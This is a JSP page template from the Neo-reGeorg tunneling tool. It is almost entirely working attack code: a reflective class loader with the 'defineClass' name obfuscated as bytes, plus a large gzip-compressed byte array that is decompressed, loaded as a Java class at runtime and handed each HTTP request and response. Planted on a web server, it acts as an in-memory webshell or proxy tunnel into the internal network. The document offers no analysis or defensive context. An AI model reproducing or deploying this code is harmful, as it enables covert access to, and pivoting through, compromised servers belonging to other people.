<jsp:root version="2.0" xmlns:jsp="http://java.sun.com/JSP/Page"><jsp:directive.page contentType="text/html"/><jsp:directive.page pageEncoding="UTF-8"/>
<jsp:declaration><![CDATA[
    public static byte[] unGzip(byte[] bytes) throws Exception{
        java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();
        java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes);
        java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in);
        byte[] buffer = new byte[256];
        int n;
        while ((n = ungzip.read(buffer)) >= 0)
            out.write(buffer, 0, n);
        return out.toByteArray();
    }

    public static Class loader(byte[] bytes) throws Exception {
        java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
        java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100,101,102,105,110,101,67,108,97,115,115}), new Class[]{byte[].class, int.class, int.class});
		method.setAccessible(true);
		Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)}); 
		return clazz;
    }
]]></jsp:declaration>

<jsp:scriptlet><![CDATA[
    Object[] args = new Object[]{
        request, //0
        response, //1
        "BASE64 CHARSLIST".toCharArray(), //2
        new byte[]{BASE64 ARRAYLIST},//3
        new Integer(HTTPCODE),//4
        new Integer(READBUF),//5
        new Integer(MAXREADSIZE),//6
        "NeoGeorg says, 'All seems fine'",//7
        new Integer(BLV_L_OFFSET),//8
    };


    if(application.getAttribute("BASE64 CHARSLIST") == null){
        byte[] clazzBytes = unGzip(new byte[]{31,-117,8,0,0,0,0,0,0,0,-91,57,11,124,83,-11,-43,-25,36,-9,-26,-34,-92,23,-102,-90,13,-12,-74,-76,-27,-95,-110,-90,-87,85,-48,40,65,80,40,69,10,45,-72,-90,82,-117,58,9,-19,109,-119,-92,9,38,41,15,31,-120,78,-35,-90,115,-22,-36,11,-100,-126,-88,-85,15,-90,-120,26,-118,104,-59,57,113,62,54,-73,-7,126,77,-89,110,-22,-100,-45,77,-35,4,43,-7,-50,-71,-9,38,77,-37,-16,125,-24,-41,95,-5,127,-98,-1,-7,-97,-9,57,-1,-37,-89,14,62,56,0,0,-57,89,-58,59,-96,0,62,-110,-32,-97,18,-36,109,-121,59,-31,99,9,118,112,-1,-119,4,-1,114,-128,4,-1,-106,-32,83,25,62,-109,-32,115,7,-83,-2,71,-122,-1,-54,-16,-123,4,-5,101,56,32,-61,-105,50,12,74,-16,-107,3,-118,-31,32,55,105,9,-63,1,-29,-32,35,106,16,29,96,71,11,-113,-84,116,20,5,-62,-122,34,-113,108,18,74,14,40,68,-103,27,59,55,14,25,11,24,90,-31,-19,49,50,-114,-107,-79,80,66,-89,3,-90,98,17,55,46,9,-117,29,-32,-59,18,110,-36,18,-114,115,64,23,18,-27,-75,88,42,-93,-22,-64,50,44,-105,112,2,-9,21,-36,84,-14,78,-107,-116,19,37,-100,-28,-64,-55,56,-123,-101,35,10,-16,72,60,-86,0,-89,-94,-121,-101,106,25,-67,124,91,13,-93,-12,113,83,-53,-45,-93,-71,-87,99,90,-114,113,-32,-79,56,-115,27,59,55,14,6,-103,94,-128,-57,-31,-15,5,-24,-57,-93,100,60,-127,-95,78,-108,113,6,-17,4,100,-100,-55,-3,73,-36,-52,-30,102,-74,-116,39,75,120,-118,3,-126,36,14,-100,-125,115,105,-124,-11,-36,88,101,-100,-57,103,27,88,34,-13,121,116,-86,-116,11,100,108,-28,-7,66,7,-12,-32,34,110,-102,36,108,118,64,8,23,59,112,9,-98,-58,43,-33,-110,-79,69,-62,32,-109,-40,42,-29,-23,50,46,117,64,37,-93,107,-109,-15,12,9,-37,25,-112,68,-71,76,-58,51,29,120,22,-98,-51,103,-66,-51,-93,115,28,-72,28,67,124,-9,10,25,59,120,-91,-109,27,-115,-101,46,-122,-22,-106,112,-91,3,46,96,-59,93,-128,97,25,-49,-27,126,-107,-116,17,-18,-83,124,-80,-121,-101,-88,-116,49,-90,119,53,55,-25,113,19,-25,38,-63,58,74,58,-32,106,-20,45,-128,19,112,13,55,107,37,92,-57,43,-21,37,60,95,-62,11,28,112,13,94,-56,-80,23,73,-72,-63,1,-41,-77,97,92,-113,23,115,-77,-111,-7,-71,-124,-101,75,-71,-7,14,25,36,94,-58,10,-66,-36,78,-14,-72,66,-62,-17,-38,-31,70,-18,-65,103,-121,45,120,5,-17,124,-33,-127,87,-30,85,-36,-4,-128,-101,-85,37,-4,-95,3,110,99,-22,111,-61,107,-72,-71,86,-62,-21,36,-4,-111,-124,-41,75,-8,99,4,-117,22,-91,-26,-52,122,106,58,53,30,-51,69,-80,-99,20,-114,-122,-109,-77,17,-84,-98,-22,-91,8,66,125,-116,-73,108,-38,121,-67,-95,72,2,-63,-19,105,58,55,-76,38,84,23,9,69,-69,-21,-106,-84,56,87,-21,72,-50,-84,94,-122,48,38,-104,12,117,-84,106,14,-83,110,13,-83,-120,104,124,7,124,78,46,66,30,65,-114,64,-122,77,102,75,-58,74,-122,39,-31,79,36,-4,-87,-124,63,35,35,32,-35,72,-8,115,4,113,-123,-1,56,38,101,-100,-25,-52,-71,-43,57,-8,-125,-55,120,56,-38,61,-109,-108,96,-64,48,37,-29,60,-93,1,-86,-103,112,-5,74,45,-44,-87,-59,87,105,-21,17,-114,-54,7,-108,15,-15,38,114,-52,-122,117,29,-38,-22,100,56,22,37,-10,-92,112,34,18,-21,8,69,70,48,-102,65,-79,-116,-76,71,39,86,68,-42,-100,-45,-87,117,-24,-110,-15,18,-51,57,-112,-115,-47,-92,-42,-83,-59,-119,-92,-47,114,-94,-48,65,90,54,-49,107,-47,-20,-7,-47,-112,121,17,18,-113,74,56,-70,38,-74,74,107,-42,-110,43,99,-99,8,-117,-14,40,99,52,-43,121,-16,87,-25,33,14,55,-109,15,-111,34,115,-81,-104,-122,112,-10,-41,-66,-93,62,18,74,36,14,-5,-42,27,72,115,-15,80,-76,115,-18,-6,-92,70,10,-80,121,26,27,117,86,29,43,120,-95,53,70,-4,-109,-14,-39,48,26,105,49,28,77,-74,-58,76,80,-47,99,64,-38,-42,104,-15,112,23,105,-67,46,-113,-54,-12,-107,117,117,81,45,89,-105,72,68,-22,-126,-63,-90,-96,-106,72,-112,-78,117,-85,117,117,-84,-44,58,86,-43,71,-62,26,-31,-115,-9,38,-110,26,73,53,-112,-47,72,66,-21,-24,-115,-121,-109,-21,-21,58,-76,120,-78,-18,-116,-29,-113,-103,81,79,-125,112,87,-72,35,-108,-44,-14,8,-95,122,-87,-124,-65,-56,32,13,106,113,-94,43,-117,-44,-43,-83,37,-25,116,-80,-95,105,-99,-115,-119,68,-81,22,39,14,-90,122,-86,15,-21,42,5,-18,-123,-99,8,-59,121,100,-86,-64,-81,-32,110,5,-18,-127,29,8,69,-93,-84,70,-63,27,-15,38,4,-25,72,82,73,-110,68,-113,41,-119,97,-5,6,90,5,94,-122,87,8,-95,14,20,95,19,-47,-110,-11,49,-62,-72,-114,84,97,-89,-75,54,34,85,-117,35,-116,-43,-49,-123,99,117,-103,5,103,-73,9,25,77,54,105,-47,-18,36,-7,45,16,24,-83,54,70,87,-9,38,-23,114,45,-44,67,-116,100,-50,-27,-84,42,-72,5,111,82,112,43,-68,-115,48,126,36,-67,115,123,-61,-111,78,102,-25,102,-36,70,-62,-64,91,20,-68,21,111,83,-32,73,120,74,-63,95,98,-97,2,127,-126,-25,50,120,-11,115,89,-89,86,-16,118,-68,67,-63,59,97,-89,-126,119,-79,20,-123,-42,-106,-45,27,20,-36,-114,-65,82,-32,89,-8,3,-39,81,92,75,104,38,103,25,-49,82,116,76,108,53,-89,-73,52,-15,-115,-124,-30,110,-68,7,-95,44,-69,-79,32,-103,92,77,-101,-60,110,-108,36,-90,-33,-76,-125,-63,-18,69,-70,100,-30,112,-77,99,-40,-60,8,-32,-5,-32,1,5,-17,-57,7,40,-46,-110,85,74,-104,82,112,23,-10,-101,55,12,29,-43,45,-88,57,20,13,-23,-22,-36,-115,15,42,-72,7,31,82,-16,97,28,48,36,-69,64,15,123,-117,67,61,-20,19,110,-99,-68,-34,100,56,82,-41,16,-19,-19,-47,-30,33,-66,76,-62,71,20,-36,-117,-113,42,-8,107,124,-116,2,-80,-126,-65,-63,-57,41,10,43,-72,15,-97,80,-16,-73,-8,-92,-63,-67,-127,74,-127,-89,-31,25,5,-97,-62,-89,21,124,6,127,-89,-64,-117,-16,-110,2,-5,-128,32,127,-113,-49,82,-28,102,-111,-2,65,-63,63,-30,-97,36,124,78,-63,-25,-15,5,9,95,36,98,76,-51,-41,26,-86,87,-16,37,-106,110,81,43,121,119,-94,75,-117,-41,54,112,-60,35,101,42,-8,50,60,67,23,38,-78,23,-30,43,-92,122,24,-60,87,21,124,13,95,53,-74,40,-97,36,123,-119,-93,-118,-116,-83,-80,-41,-49,-119,-57,67,-21,-105,-12,38,-77,86,35,-31,-21,10,-66,-127,127,102,-110,110,-95,-125,-95,-50,-50,12,-50,55,-39,-100,110,-59,-73,20,-4,11,-34,-122,80,-96,107,121,110,111,87,23,27,-86,84,-65,100,-15,-30,-122,-6,86,5,-33,38,59,-64,119,-16,93,5,-1,-118,127,-53,-43,111,35,53,-63,88,-57,42,-14,-37,-50,78,58,-100,96,51,120,79,-62,-9,21,-4,0,-1,-82,-32,-121,-8,15,-78,19,-62,57,39,73,54,-70,-94,55,73,-63,-68,112,68,20,84,-32,117,120,-125,18,-21,-110,69,100,119,-13,-25,52,54,-111,-29,-51,107,12,-102,-105,-45,-15,-18,97,-57,-85,-116,-53,-119,-39,-114,-107,33,-78,-108,72,-94,-50,-96,-96,-34,-104,-46,5,113,-83,39,-74,70,-53,57,35,-76,52,-52,-103,71,89,84,-63,-113,-16,-97,-28,63,-8,-79,-126,-97,-80,-102,-2,-91,-32,-65,-15,83,5,63,-61,103,-119,-33,-7,75,90,-38,-26,-76,-52,83,-16,115,-4,-113,-126,-1,-27,-115,47,88,-9,-73,-29,-57,-108,83,71,-5,27,-117,-119,-35,109,63,81,63,107,22,-113,14,32,-32,44,-106,-63,-105,124,-22,75,-102,-43,42,56,-120,95,41,120,16,-45,-118,5,-56,31,105,-12,-106,98,65,26,89,44,22,-85,98,17,-24,6,-117,-56,-42,-91,102,-59,-70,88,75,-82,-115,-59,87,113,-128,-118,119,-123,58,52,-59,98,-77,88,17,74,-122,-55,-35,-108,120,-58,-98,51,-53,-57,101,52,97,-111,-40,-5,-17,7,114,-98,9,-93,-20,99,88,80,-39,-86,7,21,-117,-84,-64,95,-32,109,5,-34,-124,-73,20,120,7,-34,85,44,118,-117,67,-79,20,88,20,-59,50,-58,50,54,19,-54,116,17,52,-59,56,64,-26,-88,50,-72,50,22,79,42,88,104,-95,-30,-5,6,-59,-30,100,-82,-118,112,-89,98,113,89,-118,51,-63,83,119,-71,22,-54,99,-79,30,-59,82,98,113,43,-106,113,108,-112,-109,-1,-17,-24,78,38,-79,88,-117,-59,-75,83,-87,-95,123,43,71,68,-114,88,34,25,37,-33,94,-54,57,46,-52,-90,59,2,-128,-79,-27,-58,-120,12,43,58,65,77,-31,4,5,54,-41,-48,66,99,-110,67,66,44,-98,17,56,-55,45,-41,-99,50,33,52,106,-54,51,-29,46,-61,50,-113,-103,-19,8,-17,-24,-84,-113,80,58,-76,20,-41,-70,34,20,-19,-22,50,65,117,106,30,97,-28,8,34,27,-78,17,100,-54,-13,75,67,-111,94,77,47,67,27,-39,-79,-41,-124,-62,17,46,45,-55,-30,-119,82,-62,102,11,-83,94,-83,69,105,80,123,88,-59,-98,-103,66,102,-102,-59,4,-107,-74,114,50,-106,-55,-122,37,-98,60,-43,33,121,-51,26,-90,97,73,23,87,-99,-115,-43,121,-118,50,66,-74,-106,83,-33,33,-54,69,-70,68,-20,-118,-12,38,-72,124,-19,-120,-60,18,4,103,-17,-120,-11,-84,14,-59,-75,-42,-40,33,-50,16,-77,99,99,-60,-40,80,-86,-96,-96,-108,33,-49,76,72,67,123,68,-127,-109,66,80,11,-107,-25,90,34,-101,-67,10,104,105,94,-52,80,44,-55,-53,-77,-116,41,113,-124,19,-115,-47,68,50,20,-19,32,50,-118,57,-8,-114,50,-83,41,-98,-90,-1,-35,-6,116,-106,74,71,-107,84,-39,-30,-96,64,-49,-12,-103,75,-114,62,-92,98,-14,-99,38,86,4,126,122,32,-76,-103,5,-40,16,-44,34,109,-67,105,-34,51,71,110,-27,-38,-2,-52,17,-59,84,-112,7,-102,-31,-107,58,-23,92,-97,24,17,117,126,-88,-125,-36,-128,-118,-58,-55,-98,60,36,13,-125,-103,105,-120,107,-28,114,30,113,-115,58,-55,119,-26,-92,-28,-6,88,36,98,-24,-115,66,-101,16,-47,-99,51,35,-92,-111,57,59,99,-62,-6,-70,30,-41,-40,-103,-39,40,-29,26,21,-106,108,75,-59,-71,71,-11,93,-35,-84,-61,89,31,31,-25,-55,69,-110,-15,125,-58,-79,50,-108,88,-84,107,-116,-36,-117,-22,96,33,-86,79,-122,-69,-127,89,97,-110,-97,15,89,-40,105,113,-78,-51,120,114,61,-41,-82,-121,40,-74,71,-71,64,33,9,125,120,-112,41,-51,-36,51,34,-4,-48,93,50,1,-101,-11,-67,-32,-47,-53,123,-119,-36,-107,-34,4,38,34,35,-69,-49,15,107,-111,78,2,41,26,-58,32,-67,62,9,-61,-104,97,11,20,39,-24,69,24,-28,-6,110,56,48,45,13,7,-42,97,-100,-58,59,-73,-79,59,74,17,-71,62,-60,82,30,59,-4,86,-125,-116,22,45,-79,-102,-76,-88,25,-81,-29,-15,57,-4,-28,100,-97,-103,-58,-31,-122,120,60,22,-49,-80,-98,91,-118,-81,-89,-89,65,15,-57,54,-42,110,71,108,-11,122,126,13,-114,86,64,99,-98,37,93,30,-74,-120,89,99,-69,-121,71,-89,108,-4,18,104,64,23,-56,20,112,18,-102,-2,-112,18,56,-76,-80,-27,102,2,-54,33,107,13,58,110,75,-24,11,108,104,57,-15,-57,-128,-102,-103,-1,37,110,-24,105,4,44,-23,-80,-61,-120,88,-108,-82,61,35,49,-103,57,-35,56,90,68,-128,93,-31,110,-14,-38,-71,-12,14,95,-91,7,103,15,-59,-81,124,-44,106,-20,75,-100,18,-122,40,-106,67,17,126,-66,115,64,46,-51,-54,100,120,50,-29,20,-27,-55,-69,-63,-95,87,-44,117,-111,101,-127,1,-52,20,72,1,92,11,-59,115,101,-111,-35,36,-108,5,-55,88,-74,-2,32,-89,-46,-29,-82,58,-12,53,99,20,9,66,87,36,76,-74,-87,-112,31,-74,104,61,33,-118,123,-52,105,-71,-89,62,95,-30,50,-49,-8,14,51,-49,101,-82,-16,-24,18,21,19,-85,35,28,84,-13,-7,107,117,-34,-76,110,79,-12,-82,72,-104,-119,113,28,63,-57,-13,1,17,-61,-89,83,-2,-115,27,62,34,117,27,-23,-124,66,8,-115,70,-106,120,9,-106,69,-11,33,-62,28,-55,-102,-124,-48,76,-18,-42,16,-47,122,-24,-7,64,-48,5,28,-114,-52,-87,17,-76,115,-118,66,70,55,-42,-68,47,91,39,-102,65,-94,-47,8,32,122,45,-110,-93,-86,97,5,-118,51,-100,-104,67,-17,-34,-18,40,-101,-50,-4,120,-84,-121,-29,-34,40,56,61,42,-74,-74,-97,-42,64,54,-103,7,-55,41,121,-92,57,-70,26,-54,-67,126,120,49,52,-109,-65,-27,36,-8,-125,0,-111,-94,87,53,99,18,-58,7,-126,-52,-36,102,124,-121,65,-104,-111,39,36,28,-34,-57,21,18,11,11,-46,112,124,-113,46,29,59,47,-24,-15,21,38,-63,-99,80,0,22,-72,11,-74,83,107,-31,-17,8,0,-44,-33,3,59,-88,47,-94,119,-5,-67,-80,-109,-38,-5,-52,25,61,-27,65,-12,-18,2,-68,23,-8,7,-71,-4,54,-74,-19,65,-112,96,10,-128,109,65,-51,94,-80,-48,111,-77,-49,58,109,-79,79,-104,22,16,-68,62,113,-38,94,-80,-46,-17,3,64,19,27,77,68,-6,125,0,108,62,-119,-58,82,10,100,-65,-24,-109,51,67,-101,-49,105,-53,-116,37,-97,-109,65,-20,1,-39,-25,-52,2,-40,5,-65,67,-12,23,-40,-4,-118,-28,31,35,-5,-57,58,109,-2,66,-89,-28,119,58,101,127,-111,-45,-18,119,-43,-70,28,-42,-121,-95,-96,31,20,-41,24,115,16,40,86,5,-41,88,115,-78,23,10,3,37,78,15,77,2,110,-93,27,87,-21,114,102,55,37,-29,26,-53,22,-120,-70,-118,2,-29,107,93,-82,-20,86,113,-96,84,45,77,65,-119,95,117,-85,-106,-83,96,-21,-125,19,-36,-22,67,114,-96,76,45,85,-53,82,-32,54,-42,-90,-20,-127,113,-19,-69,96,-68,58,62,5,-91,123,-64,-34,-82,-106,-19,2,-107,-58,41,40,11,-116,-17,75,63,-30,-27,-99,-14,-128,-86,-86,110,123,63,76,-24,-121,-118,-128,-101,-114,5,-58,-85,37,12,-18,85,101,-38,-42,-113,84,-87,37,41,-104,-56,-51,36,-21,118,-43,-19,46,-46,-123,65,-104,-9,89,98,52,117,-23,83,-94,-55,53,57,5,83,54,-127,-94,99,62,98,-77,-91,-123,97,49,-56,32,-44,10,-82,35,77,22,-38,106,93,71,101,-71,-79,7,-44,61,48,-75,93,29,-65,11,60,-60,2,49,80,-67,23,-68,-127,114,-75,92,-91,-85,107,-44,114,33,5,62,87,-83,90,-98,-126,-93,55,65,-99,90,-66,23,106,-67,41,-88,115,29,-45,15,-57,6,38,-88,19,80,120,24,-90,-75,91,-67,65,76,-63,116,125,91,-99,-112,-126,-29,82,112,124,-83,-53,-97,-67,-26,4,6,-19,-121,19,3,21,106,69,63,-52,80,43,118,67,0,33,80,-87,86,-18,6,50,-49,77,48,-115,71,39,33,48,69,85,-75,-82,89,-124,-75,-96,-35,-86,86,5,77,42,39,18,65,85,-3,48,91,-99,-104,-126,-109,-5,-46,79,-27,87,-42,44,-90,-13,-108,64,101,31,72,-127,42,-21,118,47,-15,110,8,119,78,10,-26,6,-86,-44,-86,20,-44,19,-86,74,117,-94,85,-99,56,-112,-126,121,106,101,10,26,-72,-103,-49,39,79,-35,13,11,16,118,67,-29,48,-46,22,-26,-110,-90,86,-19,3,-65,90,-27,90,-104,-126,69,-101,-63,71,-93,38,125,52,-103,-23,75,65,51,97,23,92,-117,-59,12,-11,-19,-126,58,-111,89,104,-21,75,-17,-28,27,-106,20,-31,-75,-37,96,12,15,79,99,50,-113,-28,-47,-73,-8,-78,39,64,-91,-109,45,6,-33,110,-111,-88,-42,-49,89,-73,23,9,64,-42,53,113,15,4,-55,-98,90,3,-109,-104,122,50,-77,118,127,21,49,92,-23,-82,-94,-51,-55,-52,-49,100,-85,-101,4,116,-70,58,73,37,59,88,-38,-105,126,85,-99,-108,-126,54,-38,19,92,103,24,-12,-72,22,50,61,-76,-37,-34,15,-53,116,-20,67,55,-22,-60,101,46,85,75,24,-22,-52,-111,-90,39,-72,-50,-54,-104,80,62,82,73,-40,5,25,91,-36,103,57,-118,-90,-118,62,85,-55,52,-49,38,-45,-36,12,27,105,-83,80,95,43,-93,-111,-109,71,-3,-16,109,127,121,63,-100,-61,-10,-111,-126,-27,123,32,68,-98,-30,38,-61,95,81,84,-48,-97,-126,14,117,-126,53,5,-99,109,106,-79,75,35,38,-70,-120,9,59,49,-31,42,8,-102,34,86,-103,37,-66,-65,-69,77,29,-25,30,-29,90,25,-20,-61,-85,8,61,-113,-61,65,-22,-58,-78,77,-97,75,-85,-67,68,-58,42,-99,-116,25,-124,45,34,100,-50,-21,38,-44,99,-40,-2,-14,20,68,-5,64,36,-13,47,118,-59,114,33,-38,-6,-16,120,58,-65,90,63,127,-17,33,-50,-17,-125,-75,110,91,63,-100,71,-57,-53,88,-98,113,-1,4,-73,-28,-81,-80,-6,43,51,-54,-85,114,79,-72,9,90,-36,19,88,-95,12,-111,32,51,-76,-70,39,-80,-38,-86,88,-85,75,121,49,-39,-26,-82,116,79,88,-18,-89,-58,109,-69,25,28,52,-85,-72,25,-100,-60,-117,-125,77,-84,55,-40,7,-123,-39,11,-6,-46,-9,100,-8,-122,113,116,113,14,-33,-27,58,-33,112,17,-47,-67,70,-89,59,-111,-97,110,-73,-37,97,70,99,118,-5,1,102,-128,-108,-63,-57,-41,-74,-79,82,-42,-23,-19,-6,77,64,-94,-28,-47,-7,100,-52,-97,100,47,-83,-52,115,105,70,-108,106,-119,-105,22,-121,60,112,-104,65,-11,-15,-28,-48,-95,-82,15,-124,102,-21,118,74,76,-9,-93,31,103,64,-91,101,-99,-27,98,-53,-91,80,41,-116,23,46,16,54,80,127,-97,-80,71,24,-96,-2,83,49,33,-82,-127,74,-15,46,-15,125,-15,67,-88,-92,-124,116,-122,-83,1,42,-79,-35,114,57,-9,-106,43,-84,11,-71,-73,46,-78,62,-89,-9,-49,-37,-26,114,79,25,43,69,89,-18,102,-16,-90,-31,-49,-96,74,-80,75,-126,126,9,44,122,-37,-113,-120,18,-20,-58,-20,-113,-66,-6,-96,-66,77,-65,-69,37,-40,3,48,8,-123,56,8,-59,18,-120,-5,-95,106,63,20,-49,-107,-32,-95,-86,-81,-96,70,-33,-33,125,16,54,-24,-125,-121,37,24,56,8,83,36,120,68,-126,-67,18,60,122,0,78,92,78,-128,-125,96,-107,-32,-41,7,-96,102,16,-100,-76,-6,37,52,31,0,75,-55,32,76,34,-44,7,-95,-112,-14,-88,40,-63,99,105,-16,-64,-28,-81,75,-38,-18,-20,-67,-103,75,-9,-96,-127,14,32,13,75,-96,-12,-21,33,-28,67,119,64,-39,55,-95,2,104,-7,33,119,26,-86,-95,-4,-101,49,-15,27,29,3,30,-128,-30,52,-44,-61,-60,111,-120,68,-126,-57,-11,-35,-57,88,103,1,18,-123,-110,38,-69,-6,-58,36,65,35,-47,116,0,92,-106,-125,48,71,-57,78,-94,125,-36,-107,6,-5,-1,-113,-53,3,80,118,0,-86,-46,80,-50,123,-116,6,-128,45,-118,11,-84,125,-16,-124,81,96,-31,-79,32,-126,76,-67,99,15,92,64,17,-27,-62,-26,-102,-127,-39,86,-65,-32,22,42,-74,-63,103,53,110,-31,50,1,-89,23,65,122,-125,95,-92,-91,-83,80,-29,-13,-34,15,-126,91,20,47,-92,-124,124,81,-101,57,-77,109,-112,-42,25,115,-41,-122,20,92,-36,-42,7,-69,115,-113,-38,-12,-93,13,-121,60,-22,-74,21,-63,39,27,-92,11,55,-26,108,-40,-100,-123,27,-60,12,-46,-115,6,-46,-50,92,-92,-46,55,64,-25,-106,-118,96,-17,6,-89,109,-40,-106,-28,60,121,-125,62,-19,75,43,-66,20,92,-78,67,47,65,-55,-107,-63,13,-62,65,24,43,-63,111,-111,-36,-14,20,-6,107,-59,-3,-80,-100,54,-97,-124,-89,76,-15,-99,13,2,56,-88,-73,-43,80,33,-48,-20,27,-104,-51,-127,-71,98,23,92,26,16,-84,36,50,-111,-92,-8,62,-35,98,-13,-71,-59,-53,68,-100,62,-99,100,-63,107,118,-73,-51,-78,37,-3,1,-75,122,109,-9,-8,48,16,-55,4,-111,116,16,-55,0,-39,-90,18,19,-52,-127,-13,24,102,45,5,-33,49,-31,-3,-78,91,118,-50,-38,10,118,-107,10,-85,-34,29,-116,-55,45,-13,-86,-127,-124,-118,-104,-12,-53,-44,-22,72,-50,86,-103,-35,66,-106,-111,-20,60,105,-125,56,12,-113,-35,109,31,-119,-57,-50,-85,6,30,-69,-114,-57,110,-32,113,19,30,-39,70,-126,92,-25,-74,51,-118,-66,116,-87,113,42,43,-70,6,40,76,-109,-4,108,-70,-31,-111,69,-118,-20,45,84,-25,-117,-125,-96,-94,-84,55,-50,65,112,99,-119,92,108,116,105,122,9,-116,-126,38,-53,124,26,-98,-95,-105,3,-65,20,-82,37,81,-37,-88,-17,118,21,53,121,93,-105,-91,-32,114,-106,119,-58,86,23,-8,-36,-12,42,16,-51,34,-103,-76,81,-86,-118,86,-94,-23,-118,20,124,87,-97,-48,-8,123,70,-75,-36,-108,3,-60,120,-12,53,-78,-85,-66,116,127,-115,-107,22,-37,-123,78,58,55,-60,-53,120,-80,-92,-63,-55,78,105,120,-41,-17,-112,72,-5,2,22,-62,-17,105,83,32,32,74,17,-4,-1,62,-109,-50,43,-63,74,-63,22,-32,28,46,-125,107,-88,10,78,-63,-9,-101,-5,-31,-54,-59,-75,-69,-31,42,46,-1,78,-91,-63,15,-72,-6,-69,58,32,-80,-40,126,24,16,85,-47,-36,-13,-16,72,-33,-68,38,96,83,109,-113,-62,-75,-101,-96,72,-75,-91,-32,58,50,-51,31,109,2,81,-40,-34,-105,126,-66,47,-99,-94,76,-106,-95,79,5,-15,43,-114,-7,68,-38,35,95,113,92,-3,35,13,106,-10,-125,-59,-110,67,-95,-99,-1,-113,105,-66,-71,-34,35,-97,39,-93,-123,75,-12,119,74,-77,117,-74,119,-64,47,72,84,66,-40,-10,-64,-11,-19,-12,16,-5,113,64,-86,112,11,-37,32,-92,82,25,-4,19,-65,-88,74,-86,-51,-86,-38,-88,-66,-3,105,-101,74,5,-55,-49,72,74,114,39,91,30,29,-78,-45,-82,-35,-86,-38,-11,-35,10,90,91,-66,124,-74,91,20,110,-123,50,-73,-24,-76,-33,2,-59,100,96,-6,123,-59,78,25,-103,-14,-69,-99,-26,-86,61,-40,-105,-34,-30,27,-110,113,43,8,28,-88,100,61,-10,61,79,-47,-116,100,-84,-113,95,-32,108,-79,12,28,57,27,70,-18,121,-127,59,-128,-3,32,-90,73,-16,121,15,18,-45,47,-62,75,38,-45,59,72,16,-84,-106,-75,94,-85,-20,44,-23,-121,-97,7,-67,-50,-87,-26,-56,-84,-90,72,18,21,-34,-127,109,-48,-30,-83,-104,-74,15,-26,83,-53,10,122,20,-20,-101,-88,88,18,-88,-74,-28,98,95,-20,-93,106,91,48,-53,27,-47,87,-63,30,-92,-118,3,44,-111,-27,-3,-80,-119,74,46,-102,114,-67,76,-37,-74,-53,-84,100,85,119,-5,116,-41,64,104,-127,110,56,55,83,40,64,21,-40,-66,-126,10,54,-12,65,56,-110,-94,-13,32,-40,-119,-16,-77,40,66,-17,7,74,80,34,81,-1,50,-68,98,26,-43,21,-90,-15,47,-9,13,80,-47,-70,88,-73,122,31,-111,-70,-120,-51,62,5,-101,3,-94,75,-30,107,111,-40,4,5,59,-31,23,76,-27,17,-82,27,-121,86,110,-30,21,-105,107,-117,-71,34,-17,-124,-83,1,-79,-42,45,-88,98,80,-73,-4,-5,-67,53,-75,62,-86,121,-121,52,82,-62,86,69,20,-67,-118,122,13,-15,90,-47,-40,-3,-108,-29,114,13,-22,117,120,-61,-92,110,46,-103,60,83,119,-92,-105,73,33,-103,-43,16,-53,55,-77,89,-89,96,-37,102,10,41,-20,125,-73,-88,-94,-73,54,5,-73,14,93,81,0,-88,75,-32,53,-119,10,-90,92,-52,111,-62,91,-90,-42,-114,38,-52,-92,101,-104,-68,7,110,35,21,-3,-78,-39,87,94,-42,41,80,41,-40,87,-74,124,118,5,89,-97,-32,99,23,-70,93,21,118,-24,-33,14,-20,-4,-49,56,-13,-20,9,116,-42,66,125,-115,-41,-90,-89,12,-81,-88,119,78,121,-35,70,-81,96,12,-99,52,-76,26,-61,-46,117,27,79,42,-33,110,34,121,7,-34,53,-111,-100,76,68,49,-110,-23,-28,31,77,53,-74,50,-122,-67,-82,-75,70,44,115,-54,-25,-101,99,-95,-52,-23,-52,-116,-83,101,-50,-46,-52,120,-121,-7,53,-29,-81,-16,55,19,-39,88,-22,-83,-4,41,68,-40,110,-18,-67,7,-17,-101,50,28,67,127,-68,103,126,4,-55,-120,-29,3,-6,-5,-5,-31,0,125,8,-1,24,-7,73,-123,-34,86,119,24,68,-64,-1,0,109,5,27,86,126,40,0,0});
        Class clazz = loader(clazzBytes);
        application.setAttribute("BASE64 CHARSLIST",clazz.newInstance());
    }
    application.getAttribute("BASE64 CHARSLIST").equals(args);
]]></jsp:scriptlet></jsp:root>